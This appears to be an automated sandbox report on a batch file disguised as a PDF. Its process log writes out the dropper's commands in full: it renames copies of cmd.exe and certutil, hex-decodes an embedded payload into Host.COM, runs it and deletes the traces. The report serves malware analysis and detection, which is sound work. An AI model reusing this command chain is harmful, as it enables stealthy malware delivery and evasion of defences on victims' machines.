Windows Analysis Report
78326473_PDF.cmd

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03

Source: C:\Users\Public\Libraries\Host.COM	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: 78326473_PDF.cmd

ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\78326473_PDF.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COM
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COM	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
